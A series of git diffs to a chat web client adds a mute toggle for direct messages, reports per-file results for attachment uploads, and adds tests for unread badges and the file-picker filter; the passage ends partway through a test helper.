@@ -1586,6 +1592,7 @@ export class ScionPageChat extends LitElement {
           peerName,
           peerId: dm.peerId,
           peerKind: dm.peerKind,
+          muted: dm.muted === true,
         };
         dispatchPageTitle(this, peerName, 'Chat');
       }
@@ -1617,6 +1624,7 @@ export class ScionPageChat extends LitElement {
             peerId: string;
             peerKind: 'user' | 'agent';
             peerSlug?: string;
+            muted?: boolean;
           }>;
         };
         const dm = data.dms?.find((d) => d.peerId === peerId);
@@ -1632,6 +1640,7 @@ export class ScionPageChat extends LitElement {
             peerName,
             peerId: dm.peerId,
             peerKind: dm.peerKind,
+            muted: dm.muted === true,
           };
           this.classList.add('thread-open');
           this.mobilePanel = 'center';
@@ -2452,6 +2461,57 @@ export class ScionPageChat extends LitElement {
     `;
   }
 
+  /**
+   * Mute toggle for a DM. Threads carry theirs in the rail's context menu;
+   * a DM has no rail row, so the conversation header is the only place a
+   * user can silence one.
+   */
+  private renderDMMuteButton(conv: V2ConversationState) {
+    const muted = conv.muted === true;
+    return html`
+      <sl-tooltip content=${muted ? 'Unmute conversation' : 'Mute conversation'}>
+        <sl-icon-button
+          class="dm-mute"
+          name=${muted ? 'bell-slash' : 'bell'}
+          label=${muted ? 'Unmute conversation' : 'Mute conversation'}
+          @click=${() => void this.toggleDMMute()}
+        ></sl-icon-button>
+      </sl-tooltip>
+    `;
+  }
+
+  /**
+   * Flip the open DM's muted state. Applied locally first and rolled back if
+   * the server refuses, so the bell never claims a state the server does not
+   * have.
+   */
+  private async toggleDMMute(): Promise<void> {
+    const conv = this.v2Conversation;
+    if (!conv) return;
+    const previous = conv.muted === true;
+    const next = !previous;
+    this.v2Conversation = { ...conv, muted: next };
+    try {
+      const res = await apiFetch(
+        `/api/v1/chat/conversations/${encodeURIComponent(conv.conversationKey)}/mute`,
+        {
+          method: 'PUT',
+          headers: { 'Content-Type': 'application/json' },
+          body: JSON.stringify({ muted: next }),
+        }
+      );
+      if (!res.ok) throw new Error('mute failed');
+      const data = (await res.json().catch(() => ({}))) as { muted?: boolean };
+      if (typeof data.muted === 'boolean' && data.muted !== next) {
+        this.v2Conversation = { ...conv, muted: data.muted };
+      }
+    } catch {
+      if (this.v2Conversation?.conversationKey === conv.conversationKey) {
+        this.v2Conversation = { ...this.v2Conversation, muted: previous };
+      }
+    }
+  }
+
   private renderV2Conversation() {
     if (!this.v2Conversation) return nothing;
     const conv = this.v2Conversation;
@@ -2495,6 +2555,7 @@ export class ScionPageChat extends LitElement {
                 : nothing}
             `}
         <div class="header-actions" style="display: flex; align-items: center; gap: 0.25rem; margin-left: auto;">
+          ${conv.isDM ? this.renderDMMuteButton(conv) : nothing}
           <sl-tooltip content="Search messages">
             <sl-icon-button
               name="search"

--- a/web/src/components/pages/chat.ts
+++ b/web/src/components/pages/chat.ts
@@ -1847,10 +1847,13 @@ export class ScionPageChat extends LitElement {
         dms?: Array<{
           peerId: string;
           hasUnread: boolean;
+          muted?: boolean;
         }>;
       };
+      // A muted DM raises no dot: muting is the user saying "stop telling me
+      // about this", and the avatar dot is the telling (#1029).
       const unreadIds = (data.dms || [])
-        .filter((dm) => dm.hasUnread)
+        .filter((dm) => dm.hasUnread && !dm.muted)
         .map((dm) => dm.peerId);
       // Only update if changed to avoid unnecessary re-renders
       if (

--- a/web/src/components/pages/chat.ts
+++ b/web/src/components/pages/chat.ts
@@ -2507,7 +2507,11 @@ export class ScionPageChat extends LitElement {
       if (!res.ok) throw new Error('mute failed');
       const data = (await res.json().catch(() => ({}))) as { muted?: boolean };
       if (typeof data.muted === 'boolean' && data.muted !== next) {
-        this.v2Conversation = { ...conv, muted: data.muted };
+        // The user may have switched conversations while the request was in
+        // flight; only reconcile if this DM is still the one on screen.
+        if (this.v2Conversation?.conversationKey === conv.conversationKey) {
+          this.v2Conversation = { ...this.v2Conversation, muted: data.muted };
+        }
       }
     } catch {
       if (this.v2Conversation?.conversationKey === conv.conversationKey) {

--- a/web/src/components/pages/chat.ts
+++ b/web/src/components/pages/chat.ts
@@ -50,6 +50,7 @@
  */
 
 import { LitElement, html, css, nothing } from 'lit';
+import type { TemplateResult } from 'lit';
 import { customElement, property, state } from 'lit/decorators.js';
 
 import type { PageData, Capabilities, Agent } from '../../shared/types.js';
@@ -2469,7 +2470,7 @@ export class ScionPageChat extends LitElement {
    * a DM has no rail row, so the conversation header is the only place a
    * user can silence one.
    */
-  private renderDMMuteButton(conv: V2ConversationState) {
+  private renderDMMuteButton(conv: V2ConversationState): TemplateResult {
     const muted = conv.muted === true;
     return html`
       <sl-tooltip content=${muted ? 'Unmute conversation' : 'Mute conversation'}>
@@ -2477,7 +2478,7 @@ export class ScionPageChat extends LitElement {
           class="dm-mute"
           name=${muted ? 'bell-slash' : 'bell'}
           label=${muted ? 'Unmute conversation' : 'Mute conversation'}
-          @click=${() => void this.toggleDMMute()}
+          @click=${(): void => void this.toggleDMMute()}
         ></sl-icon-button>
       </sl-tooltip>
     `;

--- a/web/src/components/shared/chat/chat-composer.test.ts
+++ b/web/src/components/shared/chat/chat-composer.test.ts
@@ -1,0 +1,210 @@
+/**
+ * Copyright 2026 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/**
+ * Tests for per-file attachment upload results in the composer (#1045).
+ *
+ * The server takes each file on its own merits, so a batch can come back part
+ * stored and part refused. The composer has to keep what was stored and name
+ * what was not — collapsing the answer into a single "upload failed" throws
+ * away both halves of it.
+ */
+
+// @vitest-environment happy-dom
+
+import { describe, it, expect, vi, beforeAll, afterEach } from 'vitest';
+
+/* eslint-disable @typescript-eslint/no-explicit-any */
+
+const apiFetch = vi.fn(() => Promise.resolve(new Response('{}', { status: 200 })));
+
+vi.mock('../../../client/api.js', () => ({ apiFetch }));
+
+let ATTACHMENT_ACCEPT: string;
+
+/** A composer with a file already chosen in its hidden input. */
+function createComposer(): any {
+  const el = document.createElement('scion-chat-composer') as any;
+  el.conversationMode = true;
+  el.projectId = 'proj-1';
+  return el;
+}
+
+/** Drive the file picker's change handler with a set of files. */
+async function selectFiles(el: any, names: string[]): Promise<void> {
+  const files = names.map((name) => new File(['content'], name));
+  await el.handleFileSelected({ target: { files } });
+}
+
+function respondWith(status: number, body: unknown): void {
+  apiFetch.mockResolvedValue(new Response(JSON.stringify(body), { status }));
+}
+
+const STORED = {
+  id: 'att-1',
+  name: 'compose.yaml',
+  mime: 'text/plain',
+  size: 12,
+  url: '/api/v1/chat/attachments/att-1',
+};
+
+beforeAll(async () => {
+  const mod = await import('./chat-composer.js');
+  ATTACHMENT_ACCEPT = (mod as any).ATTACHMENT_ACCEPT;
+});
+
+afterEach(() => {
+  vi.clearAllMocks();
+  document.body.innerHTML = '';
+});
+
+describe('composer — partial upload results', () => {
+  it('keeps the stored files and records the refused ones', async () => {
+    const el = createComposer();
+    respondWith(201, {
+      attachments: [STORED],
+      failures: [{ name: 'bad.exe', error: 'files with a .exe extension are not accepted' }],
+    });
+
+    await selectFiles(el, ['compose.yaml', 'bad.exe']);
+
+    expect(el.pendingFiles).toHaveLength(1);
+    expect(el.pendingFiles[0].name).toBe('compose.yaml');
+    expect(el.uploadFailures).toEqual([
+      { name: 'bad.exe', error: 'files with a .exe extension are not accepted' },
+    ]);
+  });
+
+  it('records failures from a batch where nothing was stored', async () => {
+    const el = createComposer();
+    respondWith(400, {
+      attachments: [],
+      failures: [{ name: 'a.exe', error: 'not accepted' }],
+    });
+
+    await selectFiles(el, ['a.exe']);
+
+    expect(el.pendingFiles).toHaveLength(0);
+    expect(el.uploadFailures).toHaveLength(1);
+  });
+
+  it('does not raise a composer-error when the failures are per file', async () => {
+    const el = createComposer();
+    respondWith(400, { attachments: [], failures: [{ name: 'a.exe', error: 'not accepted' }] });
+    const errors: string[] = [];
+    el.addEventListener('composer-error', (e: CustomEvent<{ message: string }>) =>
+      errors.push(e.detail.message)
+    );
+
+    await selectFiles(el, ['a.exe']);
+
+    expect(errors).toEqual([]);
+  });
+
+  it('still raises a composer-error when the whole request failed', async () => {
+    const el = createComposer();
+    respondWith(503, { message: 'Attachments not available' });
+    const errors: string[] = [];
+    el.addEventListener('composer-error', (e: CustomEvent<{ message: string }>) =>
+      errors.push(e.detail.message)
+    );
+
+    await selectFiles(el, ['compose.yaml']);
+
+    expect(errors).toEqual(['Attachments not available']);
+  });
+
+  it('clears earlier failures on the next successful upload', async () => {
+    const el = createComposer();
+    respondWith(400, { attachments: [], failures: [{ name: 'a.exe', error: 'not accepted' }] });
+    await selectFiles(el, ['a.exe']);
+    expect(el.uploadFailures).toHaveLength(1);
+
+    respondWith(201, { attachments: [STORED], failures: [] });
+    await selectFiles(el, ['compose.yaml']);
+
+    expect(el.uploadFailures).toEqual([]);
+  });
+});
+
+describe('composer — failure rendering', () => {
+  async function mount(): Promise<any> {
+    const el = createComposer();
+    document.body.appendChild(el);
+    await el.updateComplete;
+    return el;
+  }
+
+  it('names each refused file and its reason', async () => {
+    const el = await mount();
+    el.uploadFailures = [
+      { name: 'bad.exe', error: 'files with a .exe extension are not accepted' },
+      { name: 'huge.log', error: 'file exceeds the maximum size of 10485760 bytes' },
+    ];
+    await el.updateComplete;
+
+    const rows = [...el.shadowRoot.querySelectorAll('.upload-failure')];
+    expect(rows).toHaveLength(2);
+    expect(rows[0]?.textContent).toContain('bad.exe');
+    expect(rows[0]?.textContent).toContain('.exe extension are not accepted');
+    expect(rows[1]?.textContent).toContain('huge.log');
+  });
+
+  it('shows nothing when every file was accepted', async () => {
+    const el = await mount();
+
+    expect(el.shadowRoot.querySelector('.upload-failures')).toBeNull();
+  });
+
+  it('dismisses the list', async () => {
+    const el = await mount();
+    el.uploadFailures = [{ name: 'bad.exe', error: 'not accepted' }];
+    await el.updateComplete;
+
+    (el.shadowRoot.querySelector('.dismiss-btn') as HTMLButtonElement).click();
+    await el.updateComplete;
+
+    expect(el.uploadFailures).toEqual([]);
+    expect(el.shadowRoot.querySelector('.upload-failures')).toBeNull();
+  });
+});
+
+describe('composer — file picker filter', () => {
+  it('offers the developer formats the server now accepts', async () => {
+    for (const ext of ['.json', '.yaml', '.go', '.py', '.tsx', '.jsx', '.env', '.sql', '.md']) {
+      expect(ATTACHMENT_ACCEPT).toContain(ext);
+    }
+    expect(ATTACHMENT_ACCEPT).toContain('image/png');
+    expect(ATTACHMENT_ACCEPT).toContain('application/pdf');
+  });
+
+  it('does not offer the blocked extensions', async () => {
+    for (const ext of ['.exe', '.bat', '.sh', '.ps1', '.jar']) {
+      expect(ATTACHMENT_ACCEPT).not.toContain(ext);
+    }
+    // .js is blocked; .jsx is not, and contains no ".js," token.
+    expect(ATTACHMENT_ACCEPT.split(',')).not.toContain('.js');
+  });
+
+  it('puts the filter on the file input', async () => {
+    const el = createComposer();
+    document.body.appendChild(el);
+    await el.updateComplete;
+
+    const input = el.shadowRoot.querySelector('input[type="file"]');
+    expect(input?.getAttribute('accept')).toBe(ATTACHMENT_ACCEPT);
+  });
+});

--- a/web/src/components/shared/chat/chat-composer.test.ts
+++ b/web/src/components/shared/chat/chat-composer.test.ts
@@ -169,7 +169,24 @@ describe('composer — failure rendering', () => {
     expect(el.shadowRoot.querySelector('.upload-failures')).toBeNull();
   });
 
-  it('dismisses the list', async () => {
+  it('dismisses the row that was clicked and keeps the rest', async () => {
+    const el = await mount();
+    el.uploadFailures = [
+      { name: 'a.exe', error: 'not accepted' },
+      { name: 'b.sh', error: 'not accepted' },
+      { name: 'c.bat', error: 'not accepted' },
+    ];
+    await el.updateComplete;
+
+    const dismissRows = [...el.shadowRoot.querySelectorAll('.dismiss-btn')];
+    (dismissRows[1] as HTMLButtonElement).click();
+    await el.updateComplete;
+
+    expect(el.uploadFailures.map((f: { name: string }) => f.name)).toEqual(['a.exe', 'c.bat']);
+    expect(el.shadowRoot.querySelectorAll('.upload-failure')).toHaveLength(2);
+  });
+
+  it('clears the surface once the last row is dismissed', async () => {
     const el = await mount();
     el.uploadFailures = [{ name: 'bad.exe', error: 'not accepted' }];
     await el.updateComplete;
@@ -179,6 +196,36 @@ describe('composer — failure rendering', () => {
 
     expect(el.uploadFailures).toEqual([]);
     expect(el.shadowRoot.querySelector('.upload-failures')).toBeNull();
+  });
+});
+
+describe('composer — whole-request error messages', () => {
+  it('reads the reason out of the hub error envelope', async () => {
+    const el = createComposer();
+    respondWith(503, {
+      error: { code: 'SERVICE_UNAVAILABLE', message: 'Attachments not available' },
+    });
+    const errors: string[] = [];
+    el.addEventListener('composer-error', (e: CustomEvent<{ message: string }>) =>
+      errors.push(e.detail.message)
+    );
+
+    await selectFiles(el, ['compose.yaml']);
+
+    expect(errors).toEqual(['Attachments not available']);
+  });
+
+  it('falls back to a generic message when the body carries no reason', async () => {
+    const el = createComposer();
+    respondWith(500, {});
+    const errors: string[] = [];
+    el.addEventListener('composer-error', (e: CustomEvent<{ message: string }>) =>
+      errors.push(e.detail.message)
+    );
+
+    await selectFiles(el, ['compose.yaml']);
+
+    expect(errors).toEqual(['Upload failed']);
   });
 });
 

--- a/web/src/components/shared/chat/chat-composer.ts
+++ b/web/src/components/shared/chat/chat-composer.ts
@@ -29,6 +29,7 @@
  */
 
 import { LitElement, html, css, nothing } from 'lit';
+import type { TemplateResult } from 'lit';
 import { customElement, property, state } from 'lit/decorators.js';
 import type { Agent } from '../../../shared/types.js';
 import type { MentionAcceptDetail } from './mention-autocomplete.js';
@@ -744,19 +745,19 @@ export class ScionChatComposer extends LitElement {
    * error about the message — the rest of the batch is still attached — so it
    * belongs next to the attachments rather than in a toast that replaces them.
    */
-  private renderUploadFailures() {
+  private renderUploadFailures(): TemplateResult {
     return html`
       <div class="upload-failures">
         ${this.uploadFailures.map(
-          (failure) => html`
+          (failure, index) => html`
             <div class="upload-failure">
               <sl-icon name="exclamation-triangle" style="font-size:0.75rem"></sl-icon>
               <span class="failure-name">${failure.name}</span>
               <span class="failure-reason">${failure.error}</span>
               <button
                 class="dismiss-btn"
-                aria-label="Dismiss"
-                @click=${() => this.dismissUploadFailures()}
+                aria-label="Dismiss ${failure.name}"
+                @click=${(): void => this.dismissUploadFailure(index)}
               >
                 &times;
               </button>
@@ -767,8 +768,13 @@ export class ScionChatComposer extends LitElement {
     `;
   }
 
-  private dismissUploadFailures(): void {
-    this.uploadFailures = [];
+  /**
+   * Dismiss one row. The × sits on the row, so it has to clear that row —
+   * clearing the list would silently throw away the failures the user has not
+   * read yet, which is the thing this surface exists to prevent.
+   */
+  private dismissUploadFailure(index: number): void {
+    this.uploadFailures = this.uploadFailures.filter((_, i) => i !== index);
   }
 
   /** Open the hidden file input. */
@@ -815,6 +821,10 @@ export class ScionChatComposer extends LitElement {
       const data = (await res.json().catch(() => ({}))) as {
         attachments?: UploadedAttachment[];
         failures?: UploadFailure[];
+        // The hub's error helper nests the reason under `error`; a plain
+        // `message` is read too so a handler that answers flat is not silently
+        // reduced to "Upload failed".
+        error?: { message?: string };
         message?: string;
       };
 
@@ -830,7 +840,7 @@ export class ScionChatComposer extends LitElement {
       if (!res.ok && this.uploadFailures.length === 0) {
         this.dispatchEvent(
           new CustomEvent('composer-error', {
-            detail: { message: data.message || 'Upload failed' },
+            detail: { message: data.error?.message || data.message || 'Upload failed' },
             bubbles: true,
             composed: true,
           })

--- a/web/src/components/shared/chat/chat-composer.ts
+++ b/web/src/components/shared/chat/chat-composer.ts
@@ -46,6 +46,35 @@ export interface UploadedAttachment {
   url: string;
 }
 
+/**
+ * A file the server refused. Uploads are per-file, so a batch can come back
+ * part stored and part rejected and the composer has to say which is which.
+ */
+export interface UploadFailure {
+  name: string;
+  error: string;
+}
+
+/**
+ * What the file picker offers. The MIME types cover what browsers recognise;
+ * the extensions cover the developer formats they do not, which browsers
+ * report as application/octet-stream and the server classifies by content
+ * (see ClassifyAttachment). Keep in step with textLikeExtensions in
+ * pkg/hub/attachment_classify.go.
+ */
+export const ATTACHMENT_ACCEPT = [
+  'image/jpeg',
+  'image/png',
+  'image/gif',
+  'image/webp',
+  'application/pdf',
+  'application/zip',
+  '.txt,.md,.rst,.adoc,.log,.csv',
+  '.json,.yaml,.yml,.toml,.ini,.cfg,.env,.xml',
+  '.diff,.patch,.sql,.graphql,.proto',
+  '.ts,.tsx,.jsx,.py,.go,.rs,.rb,.java,.kt,.swift,.c,.cpp,.h,.hpp,.cs',
+].join(',');
+
 /** Event detail for the chat-send custom event. */
 export interface ChatSendDetail {
   text: string;
@@ -128,6 +157,9 @@ export class ScionChatComposer extends LitElement {
 
   /** W7: Upload in progress. */
   @state() private uploading = false;
+
+  /** Files the last upload refused, shown until dismissed or superseded. */
+  @state() private uploadFailures: UploadFailure[] = [];
 
   /** Set of accepted mention slugs. Filtered to those still present on send. */
   private acceptedMentions = new Set<string>();
@@ -369,6 +401,36 @@ export class ScionChatComposer extends LitElement {
       color: var(--scion-danger-600, #dc2626);
     }
 
+    .upload-failures {
+      display: flex;
+      flex-direction: column;
+      gap: 0.125rem;
+      padding: 0.25rem;
+    }
+
+    .upload-failure {
+      display: flex;
+      align-items: center;
+      gap: 0.25rem;
+      font-size: 0.6875rem;
+      color: var(--scion-danger-600, #dc2626);
+    }
+
+    .upload-failure .failure-name {
+      font-weight: 600;
+    }
+
+    .upload-failure .dismiss-btn {
+      margin-left: auto;
+      cursor: pointer;
+      color: var(--scion-text-muted, #94a3b8);
+      padding: 0;
+      line-height: 1;
+      background: none;
+      border: none;
+      font-size: 0.875rem;
+    }
+
     .upload-progress {
       font-size: 0.6875rem;
       color: var(--scion-text-muted, #64748b);
@@ -388,6 +450,7 @@ export class ScionChatComposer extends LitElement {
       ${this.conversationMode ? this.renderDestinationChip() : nothing}
       <div class="composer">
         ${this.pendingFiles.length > 0 ? this.renderPendingFiles() : nothing}
+        ${this.uploadFailures.length > 0 ? this.renderUploadFailures() : nothing}
         ${this.uploading ? html`<div class="upload-progress">Uploading...</div>` : nothing}
         <div class="input-row">
           ${this.conversationMode
@@ -402,7 +465,7 @@ export class ScionChatComposer extends LitElement {
                 <input
                   type="file"
                   multiple
-                  accept="image/jpeg,image/png,image/gif,image/webp,application/pdf,text/plain,text/markdown,application/zip"
+                  accept=${ATTACHMENT_ACCEPT}
                   style="display:none"
                   @change=${this.handleFileSelected}
                 />
@@ -676,6 +739,38 @@ export class ScionChatComposer extends LitElement {
     `;
   }
 
+  /**
+   * Render the files the server would not take. A rejected file is not an
+   * error about the message — the rest of the batch is still attached — so it
+   * belongs next to the attachments rather than in a toast that replaces them.
+   */
+  private renderUploadFailures() {
+    return html`
+      <div class="upload-failures">
+        ${this.uploadFailures.map(
+          (failure) => html`
+            <div class="upload-failure">
+              <sl-icon name="exclamation-triangle" style="font-size:0.75rem"></sl-icon>
+              <span class="failure-name">${failure.name}</span>
+              <span class="failure-reason">${failure.error}</span>
+              <button
+                class="dismiss-btn"
+                aria-label="Dismiss"
+                @click=${() => this.dismissUploadFailures()}
+              >
+                &times;
+              </button>
+            </div>
+          `
+        )}
+      </div>
+    `;
+  }
+
+  private dismissUploadFailures(): void {
+    this.uploadFailures = [];
+  }
+
   /** Open the hidden file input. */
   private handleAttachClick(): void {
     const input = this.shadowRoot?.querySelector('input[type="file"]') as HTMLInputElement | null;
@@ -717,22 +812,30 @@ export class ScionChatComposer extends LitElement {
         body: formData,
       });
 
-      if (!res.ok) {
-        const errData = await res.json().catch(() => ({ message: 'Upload failed' }));
+      const data = (await res.json().catch(() => ({}))) as {
+        attachments?: UploadedAttachment[];
+        failures?: UploadFailure[];
+        message?: string;
+      };
+
+      // The server reports per file: some may be stored while others are
+      // refused. Anything it did take is attached, and the refusals are named
+      // rather than collapsed into one "upload failed".
+      this.uploadFailures = data.failures ?? [];
+      if (data.attachments?.length) {
+        this.pendingFiles = [...this.pendingFiles, ...data.attachments];
+      }
+
+      // A failure with no per-file detail is about the request itself.
+      if (!res.ok && this.uploadFailures.length === 0) {
         this.dispatchEvent(
           new CustomEvent('composer-error', {
-            detail: { message: (errData as Record<string, string>).message || 'Upload failed' },
+            detail: { message: data.message || 'Upload failed' },
             bubbles: true,
             composed: true,
           })
         );
-        return;
       }
-
-      const data = (await res.json()) as {
-        attachments: UploadedAttachment[];
-      };
-      this.pendingFiles = [...this.pendingFiles, ...data.attachments];
     } catch (err) {
       this.dispatchEvent(
         new CustomEvent('composer-error', {

--- a/web/src/components/shared/chat/chat-space-rail-mute-pin.test.ts
+++ b/web/src/components/shared/chat/chat-space-rail-mute-pin.test.ts
@@ -291,4 +291,26 @@ describe('space rail — muted rendering', () => {
     expect(el.shadowRoot.querySelector('.mute-toggle')?.textContent?.trim()).toBe('Unmute');
     expect(el.shadowRoot.querySelector('.pin-toggle')?.textContent?.trim()).toBe('Unpin');
   });
+
+  it('marks the menu glyphs with the current state, not the pending action', async () => {
+    const el = await mount([thread()]);
+    el.contextMenuTarget = { type: 'thread', thread: thread(), projectId: SPACE.projectId };
+    await el.updateComplete;
+
+    const glyph = (selector: string): string | null | undefined =>
+      el.shadowRoot.querySelector(`${selector} sl-icon`)?.getAttribute('name');
+
+    expect(glyph('.pin-toggle')).toBe('star');
+    expect(glyph('.mute-toggle')).toBe('bell');
+
+    el.contextMenuTarget = {
+      type: 'thread',
+      thread: thread({ muted: true, pinned: true }),
+      projectId: SPACE.projectId,
+    };
+    await el.updateComplete;
+
+    expect(glyph('.pin-toggle')).toBe('star-fill');
+    expect(glyph('.mute-toggle')).toBe('bell-slash');
+  });
 });

--- a/web/src/components/shared/chat/chat-space-rail-mute-pin.test.ts
+++ b/web/src/components/shared/chat/chat-space-rail-mute-pin.test.ts
@@ -122,6 +122,86 @@ describe('space rail — mute toggle', () => {
   });
 });
 
+/**
+ * The space badge is a server-side rollup that skips muted threads, so every
+ * local adjustment the rail makes has to skip them too. Getting this wrong is
+ * invisible until the counts drift apart.
+ */
+describe('space rail — space badge follows mute', () => {
+  /** The rail's copy of the space badge. */
+  function badge(el: any): number {
+    return el.spaces.find((s: any) => s.projectId === SPACE.projectId).unreadCount;
+  }
+
+  it('takes an unread thread out of the badge when it is muted', async () => {
+    const el = createRail([thread({ hasUnread: true })]);
+    apiFetchMock.mockResolvedValue(new Response(JSON.stringify({ muted: true }), { status: 200 }));
+
+    await el.handleToggleMute(thread({ hasUnread: true }), SPACE.projectId);
+
+    expect(badge(el)).toBe(0);
+  });
+
+  it('puts it back when the thread is unmuted', async () => {
+    const el = createRail([thread({ hasUnread: true, muted: true })]);
+    el.spaces = [{ ...SPACE, unreadCount: 0 }];
+    apiFetchMock.mockResolvedValue(new Response(JSON.stringify({ muted: false }), { status: 200 }));
+
+    await el.handleToggleMute(thread({ hasUnread: true, muted: true }), SPACE.projectId);
+
+    expect(badge(el)).toBe(1);
+  });
+
+  it('restores the badge when the mute is rolled back', async () => {
+    const el = createRail([thread({ hasUnread: true })]);
+    apiFetchMock.mockResolvedValue(new Response('{}', { status: 500 }));
+
+    await el.handleToggleMute(thread({ hasUnread: true }), SPACE.projectId);
+
+    expect(badge(el)).toBe(1);
+  });
+
+  it('leaves the badge alone for a read thread', async () => {
+    const el = createRail([thread({ hasUnread: false })]);
+    apiFetchMock.mockResolvedValue(new Response(JSON.stringify({ muted: true }), { status: 200 }));
+
+    await el.handleToggleMute(thread({ hasUnread: false }), SPACE.projectId);
+
+    expect(badge(el)).toBe(1);
+  });
+
+  it('does not decrement the badge when a muted thread is marked read', async () => {
+    const el = createRail([thread({ hasUnread: true, muted: true, lastMessageId: 'm-1' })]);
+    apiFetchMock.mockResolvedValue(new Response('{}', { status: 200 }));
+
+    await el.handleMarkRead(
+      thread({ hasUnread: true, muted: true, lastMessageId: 'm-1' }),
+      SPACE.projectId
+    );
+
+    expect(storedThread(el).hasUnread).toBe(false);
+    expect(badge(el)).toBe(1);
+  });
+
+  it('still decrements for an unmuted thread marked read', async () => {
+    const el = createRail([thread({ hasUnread: true, lastMessageId: 'm-1' })]);
+    apiFetchMock.mockResolvedValue(new Response('{}', { status: 200 }));
+
+    await el.handleMarkRead(thread({ hasUnread: true, lastMessageId: 'm-1' }), SPACE.projectId);
+
+    expect(badge(el)).toBe(0);
+  });
+
+  it('markThreadRead skips the badge for a muted thread', () => {
+    const el = createRail([thread({ hasUnread: true, muted: true })]);
+
+    el.markThreadRead('topic-1');
+
+    expect(storedThread(el).hasUnread).toBe(false);
+    expect(badge(el)).toBe(1);
+  });
+});
+
 describe('space rail — pin toggle', () => {
   it('PUTs the pin endpoint and marks the thread pinned', async () => {
     const el = createRail([thread()]);

--- a/web/src/components/shared/chat/chat-space-rail-mute-pin.test.ts
+++ b/web/src/components/shared/chat/chat-space-rail-mute-pin.test.ts
@@ -230,6 +230,25 @@ describe('space rail — space badge follows mute', () => {
     expect(badge(el)).toBe(1);
   });
 
+  it('clears the space badge when mark-all-read succeeds', async () => {
+    const el = createRail([thread({ hasUnread: true })]);
+    apiFetchMock.mockResolvedValue(new Response('{}', { status: 200 }));
+
+    await el.handleMarkSpaceRead(SPACE.projectId);
+
+    expect(storedThread(el).hasUnread).toBe(false);
+    expect(badge(el)).toBe(0);
+  });
+
+  it('keeps the space badge when the server refuses mark-all-read', async () => {
+    const el = createRail([thread({ hasUnread: true })]);
+    apiFetchMock.mockResolvedValue(new Response('{}', { status: 500 }));
+
+    await el.handleMarkSpaceRead(SPACE.projectId);
+
+    expect(storedThread(el).hasUnread).toBe(true);
+    expect(badge(el)).toBe(1);
+  });
 });
 
 describe('space rail — pin toggle', () => {

--- a/web/src/components/shared/chat/chat-space-rail-mute-pin.test.ts
+++ b/web/src/components/shared/chat/chat-space-rail-mute-pin.test.ts
@@ -192,6 +192,35 @@ describe('space rail — space badge follows mute', () => {
     expect(badge(el)).toBe(0);
   });
 
+  it('leaves the badge alone when an already-read thread is marked read', async () => {
+    // "Mark as read" is offered on every thread, read or not. Each click used
+    // to take one off the badge, so a few clicks on a read thread could drive
+    // it to zero while other threads still showed their unread dots.
+    const el = createRail([
+      thread({ id: 'topic-1', hasUnread: false, lastMessageId: 'm-1' }),
+      thread({ id: 'topic-2', hasUnread: true }),
+    ]);
+    el.spaces = [{ ...SPACE, unreadCount: 1 }];
+    apiFetchMock.mockResolvedValue(new Response('{}', { status: 200 }));
+
+    const target = thread({ id: 'topic-1', hasUnread: false, lastMessageId: 'm-1' });
+    await el.handleMarkRead(target, SPACE.projectId);
+    await el.handleMarkRead(target, SPACE.projectId);
+
+    expect(badge(el)).toBe(1);
+    expect(storedThread(el, 'topic-2').hasUnread).toBe(true);
+  });
+
+  it('leaves the badge alone when the server refuses the mark-read', async () => {
+    const el = createRail([thread({ hasUnread: true, lastMessageId: 'm-1' })]);
+    apiFetchMock.mockResolvedValue(new Response('{}', { status: 500 }));
+
+    await el.handleMarkRead(thread({ hasUnread: true, lastMessageId: 'm-1' }), SPACE.projectId);
+
+    expect(storedThread(el).hasUnread).toBe(true);
+    expect(badge(el)).toBe(1);
+  });
+
   it('markThreadRead skips the badge for a muted thread', () => {
     const el = createRail([thread({ hasUnread: true, muted: true })]);
 
@@ -200,6 +229,7 @@ describe('space rail — space badge follows mute', () => {
     expect(storedThread(el).hasUnread).toBe(false);
     expect(badge(el)).toBe(1);
   });
+
 });
 
 describe('space rail — pin toggle', () => {

--- a/web/src/components/shared/chat/chat-space-rail-mute-pin.test.ts
+++ b/web/src/components/shared/chat/chat-space-rail-mute-pin.test.ts
@@ -1,0 +1,214 @@
+/**
+ * Copyright 2026 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/**
+ * Tests for the rail's mute and pin context-menu actions (#1029, #1030).
+ *
+ * Both toggles apply locally before the server answers so the rail reorders on
+ * the click, and both roll back when the PUT fails — a pin or mute the server
+ * does not have must not survive on screen. Muting also suppresses the unread
+ * marker, which is the visible payoff of the feature.
+ */
+
+// @vitest-environment happy-dom
+
+import { describe, it, expect, vi, beforeAll, beforeEach, afterEach } from 'vitest';
+import { apiFetch } from '../../../client/api.js';
+
+/* eslint-disable @typescript-eslint/no-explicit-any */
+
+vi.mock('../../../client/api.js', () => ({
+  apiFetch: vi.fn(() => Promise.resolve(new Response('{}', { status: 200 }))),
+}));
+
+const apiFetchMock = vi.mocked(apiFetch);
+
+const SPACE = {
+  projectId: 'proj-1',
+  projectName: 'Chat Test',
+  projectSlug: 'chat-test',
+  unreadCount: 1,
+  hasUnreadMention: false,
+};
+
+function thread(overrides: Record<string, unknown> = {}): any {
+  return {
+    id: 'topic-1',
+    name: 'deploys',
+    isGeneral: false,
+    pinned: false,
+    muted: false,
+    hasUnread: false,
+    hasUnreadMention: false,
+    ...overrides,
+  };
+}
+
+/** A rail with one expanded space holding the given threads. */
+function createRail(threads: any[]): any {
+  const el = document.createElement('scion-chat-space-rail') as any;
+  el.spaces = [SPACE];
+  el.threadsBySpace = new Map([[SPACE.projectId, threads]]);
+  el.collapsedSpaces = new Set<string>();
+  el.loading = false;
+  return el;
+}
+
+/** The rail's copy of a thread after an action has run. */
+function storedThread(el: any, id = 'topic-1'): any {
